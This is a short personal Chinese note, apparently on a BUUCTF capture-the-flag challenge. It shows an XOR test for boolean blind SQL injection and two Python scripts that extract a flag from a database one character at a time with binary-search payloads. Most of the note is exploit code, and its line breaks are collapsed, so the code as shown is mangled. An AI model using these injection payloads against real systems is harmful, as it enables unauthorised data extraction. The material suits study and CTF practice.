自用

题目

考虑是不是布尔盲注，如何测试：用"1^1^1=1   1^0^1=0，就像是真真真等于真，真假真等于假"这个测试

SQL布尔盲注脚本1

import requestsurl = "http://8e4a9bf2-c055-4680-91fd-5b969ebc209e.node5.buuoj.cn:81/index.php"
flag = ""
i = 0while True:i = i + 1letf = 32right = 127while letf < right:mid = (letf+right) // 2payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"data = {"id":payload}res = requests.post(url=url, data=data).textif "Hello" in res:letf = mid + 1else:right = midif letf != 32:flag += chr(letf)print(flag)else:break

SQL布尔盲注脚本2

import requests
#调用请求模块
import time
#调用时间模块
import re
#调用规则表达式模块
url='http://1c6ac3dd-eab6-41d6-85a3-a5f888577768.node4.buuoj.cn:81/'
#题目链接
flag = ''
#创建一个变量用来存放flag值
for i in range(1,50):#for循环遍历，i表示flag值大致长度是50以内max = 127#赋值127min = 0#赋值0for c in range(0,127):#for循环遍历s = (int)((max+min)/2)#首先将 max 和 min 相加，然后除以 2，最后将结果强制转换为整数类型。payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'#^异或运算符，相同为假，不相同为真，1^payload，若为payload结果为假，则返回0，1^0=1，将得到查询id=1时的结果，回显Hello, glzjin wants a girlfriend。#从flag数据表中选择一个名为flag的字段，然后取这个字段的字符串（从位置 '+str(i)+' 开始，长度为 1（每次只返回一个））#将这个字符串转换为 ASCII 码，然后判断这个 ASCII 码是否大于一个名为 "s" 的变量。r = requests.post(url,data = {'id':payload})#requests模块的运用，将payload赋值给题目中这个名为id的参数time.sleep(0.005)#每循环一次休眠0.005秒if 'Hello' in str(r.content):#如果Hello这个字符串在生成的结果中，那么就继续向下进行max=s#将s的值赋值给maxelse:#反之min=s#将s的值赋值给minif((max-min)<=1):#如果max-min的值flag+=chr(max)#将max的ASCII值转化为字符串print(flag)#输出flagbreak#跳出循环